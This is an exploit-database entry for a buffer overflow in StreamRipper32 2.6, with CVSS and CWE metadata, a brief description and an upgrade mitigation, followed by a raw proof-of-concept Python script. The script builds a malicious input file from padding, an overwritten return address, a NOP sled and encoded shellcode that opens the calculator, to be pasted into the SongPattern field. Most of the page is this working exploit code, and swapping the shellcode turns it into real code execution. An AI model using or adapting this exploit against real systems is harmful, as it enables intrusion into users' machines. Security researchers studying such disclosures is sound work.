StreamRipper32 2.6 - Buffer Overflow (PoC)

vendor:

StreamRipper32

by:

Andy Bowden

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: StreamRipper32

Affected Version From: 2.6

Affected Version To: 2.6

Patch Exists: YES

Related CWE: N/A

CPE: a:streamripper:streamripper32

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Win10 x64

2020

StreamRipper32 2.6 – Buffer Overflow (PoC)

StreamRipper32 is a Windows application that allows users to record streaming audio from the Internet. A buffer overflow vulnerability exists in StreamRipper32 version 2.6 when a user adds a maliciously crafted string to the 'SongPattern' field in the 'Station/Song Section' of the application. This can be exploited to execute arbitrary code by a remote attacker.

Mitigation:

Upgrade to the latest version of StreamRipper32.

Source

Exploit-DB raw data:

# Exploit Title: StreamRipper32 2.6 - Buffer Overflow (PoC)
# Date: 2020-05-14
# Exploit Author: Andy Bowden
# Tested On: Win10 x64
# Download Link: http://streamripper.sourceforge.net/sr32/StreamRipper32_2_6.exe
# Vendor Page: http://streamripper.sourceforge.net/
# Version: 2.6
# Steps To Reproduce: Double click on "Add" in the"Station/Song Section" and paste the output in "SongPattern"

#Bad Characters \x00\x0A\x0D  
file = open('exploit.txt', 'wb')  
  
buf = b""  
buf += b"A" * 256  
buf += b"\x47\x23\x30\x74" #74302347  
buf += b"\x90" * 30

#calc payload  
buf += b"\xdb\xc2\xbd\x72\x07\xda\xa7\xd9\x74\x24\xf4\x58\x29"  
buf += b"\xc9\xb1\x31\x83\xe8\xfc\x31\x68\x14\x03\x68\x66\xe5"  
buf += b"\x2f\x5b\x6e\x6b\xcf\xa4\x6e\x0c\x59\x41\x5f\x0c\x3d"  
buf += b"\x01\xcf\xbc\x35\x47\xe3\x37\x1b\x7c\x70\x35\xb4\x73"  
buf += b"\x31\xf0\xe2\xba\xc2\xa9\xd7\xdd\x40\xb0\x0b\x3e\x79"  
buf += b"\x7b\x5e\x3f\xbe\x66\x93\x6d\x17\xec\x06\x82\x1c\xb8"  
buf += b"\x9a\x29\x6e\x2c\x9b\xce\x26\x4f\x8a\x40\x3d\x16\x0c"  
buf += b"\x62\x92\x22\x05\x7c\xf7\x0f\xdf\xf7\xc3\xe4\xde\xd1"  
buf += b"\x1a\x04\x4c\x1c\x93\xf7\x8c\x58\x13\xe8\xfa\x90\x60"  
buf += b"\x95\xfc\x66\x1b\x41\x88\x7c\xbb\x02\x2a\x59\x3a\xc6"  
buf += b"\xad\x2a\x30\xa3\xba\x75\x54\x32\x6e\x0e\x60\xbf\x91"  
buf += b"\xc1\xe1\xfb\xb5\xc5\xaa\x58\xd7\x5c\x16\x0e\xe8\xbf"  
buf += b"\xf9\xef\x4c\xcb\x17\xfb\xfc\x96\x7d\xfa\x73\xad\x33"  
buf += b"\xfc\x8b\xae\x63\x95\xba\x25\xec\xe2\x42\xec\x49\x1c"  
buf += b"\x09\xad\xfb\xb5\xd4\x27\xbe\xdb\xe6\x9d\xfc\xe5\x64"  
buf += b"\x14\x7c\x12\x74\x5d\x79\x5e\x32\x8d\xf3\xcf\xd7\xb1"  
buf += b"\xa0\xf0\xfd\xd1\x27\x63\x9d\x3b\xc2\x03\x04\x44"  
buf += b"\x90" * (1000 - len(buf))  

file.write(buf)
file.close()